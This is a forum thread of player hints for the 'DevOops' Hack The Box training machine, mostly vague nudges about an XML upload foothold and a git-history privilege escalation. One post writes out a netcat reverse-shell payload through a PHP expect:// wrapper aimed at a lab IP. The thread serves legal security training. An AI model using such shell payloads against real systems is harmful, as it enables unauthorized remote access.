Dev0ops hints

191012141521

Comments

  • what is save.p means?? rabbit hole? please PM me.

  • Finally got priv esc - Time machine is a perfect hint ;)

    Mochan

    Checkout my Dropbox of Goodies >> https://www.dropbox.com/sh/ba0t59c5fnccgms/AACvUbUSflWB1_AAgj8okEUra?dl=0

    [CCNA R&S] [OSCP - In Progress] [Security+ - In Progress]

  • edited July 2018

    PriEsc --> for me "rename" was the hint. hope it is not spoiler

  • edited July 2018

    Nailed it ! - got root

    Thanks to hYTORELD & strolling 33 for the hint - I was close :)

    Do not overthink this box !

    ZaphodBB

  • Good box! Thanks @lokori !
    Lesson learned from the box is to make sure your commands do what you intended!

  • Got user finally! That part was nice, like the different kind of exploit than I've seen on a few of these. Now to start the battle for root. Thanks for all the help!

  • This box is great, pushed me to learn things I didn't know about before! Thanks @lokori

  • This one (especially privesc) is soo easy if you are dev ;)

  • edited August 2018

    Stuck on Privesc on this one, have an idea but have a question could anyone PM me

    Edit --
    Nvm got Root was way over complicating things

  • edited August 2018

    I got the user flag without a shell.
    Can you also get to the root flag without using a shell?

    Faraday9

  • @Faraday9 said:
    Is a shell mandatory for this box or can you get to the root flag without one?

    You need access to the box in order to get root

  • Finally got a shell! now for the root.

    Faraday9

  • Stuck on privesc too... found timemachine and used it, but I can not escalate, stay with user privs... Please PM me.

  • expect://nc -c '/bin/bash 10.10.. 4444

  • why nothing works?

  • @waspy You can't do remote code execution on this box. From my understanding the server needs some sort of php module for that.

    If anyone needs a hint I'm here, just completed the box.

  • edited August 2018

    Took me a few long brain crunching hours but I finally got root.
    I was overthinking so hard that I didn't see the obvious solution.
    Amazing box.
    learnt a lot from it.
    Would Recommend!!!!

    Faraday9

  • Hi
    Just need a pointer to get the initial foothold on this box, I think I have done enough enumeration and I'm trying to upload something and getting "Internal Server Error". Am I on the right track??
    Any advice would be greatly received!

    Hack The Box

  • @moony8272 said:
    Hi
    Just need a pointer to get the initial foothold on this box, I think I have done enough enumeration and I'm trying to upload something and getting "Internal Server Error". Am I on the right track??
    Any advice would be greatly received!

    Look up the format that is being parsed and read the text on the website. You can PM me if you need another nudge.

  • Not too hard of a box. Was able to figure out with basic enumeration and then looking through the hints on here. Fun box though!

  • need help in priv esc. Can anyone a PM?

  • Anyone who needs help is welcome to PM me.

  • Already got interesting file but definitely don't know what to do next. Am I right that I need to send something to the ne***st for user.txt?

  • @iammainul said:
    need help in priv esc. Can anyone a PM?

    Shoot me a message, if you still need help.

    mrtnrdl

  • I've gotten quite a few PMs about this box. I've also seen a lot of hints that kind of reiterate the same thing over and over so maybe this will help all those who are stuck.

    While the path to root isn't as complicated as it feels if you've been digging around for a while, it's also not quite as obvious I don't think as everyone states if you're new to what you need to work with on this box.

    Yes, RTFM is quite a thing and I agree. But to hopefully cut down on the cycle of "I've read the hints and done the things and can't see what I'm missing or if I'm on the right track" I'd like to re-contextualize the hint that's been repetitiously stated into something that may be of more conceptual aid, without adding any new hints or information.

    Think about the things you are looking through/need to look through as a blueprint of a building, and the lines you are looking through in those locations as paths in the building or rooms. You need to find the correct path and room you need to be in. Go through things line by line and if you don't understand what the line is doing, research until you do. This will help you better be able to read the blueprint and to know which path and rooms are important, which are not, and where to find the tools you need to get into the rooms you need to be in.

    Happy Hunting

    Arrexel

  • @Didakt said:
    Rooted !
    Very cool box, thanks to the creator :)

    And the first hint some one gave for priv esc was just perfect :

    "Far far ago, there was a man that could view back into the past, and see alternated versions of realities , how did he do that mate?"

    Think about it !

    Thanks for the box

    Cheers. This gave me the nudge I needed :)

    alt text

  • rooted! dm me for hints!

  • finally got root, if someone needs help, just PM me...

    Ozunu

  • edited August 2018

    After figuring out what I was doing wrong with uploading the xml, I wanted to punch my own face. Basically had the xml formatting correct the whole time but it was the SYNTAX to pay very close attention to combined with the few hints the "developer" left . Hope this doesn't give away too much, first comment on the forum, 5th "user" I've gotten. I think I know where to go with root now. Time to find out. Thanks for the hints to everyone as well. They were exactly what I needed to know I was on the right track, without giving away too much and taking away from the learning experience.

  • hopelessly stuck on devoops, I know the method is similar to aragog but i cant find the proper syntax to inject or where to inject it please help

Sign In to comment.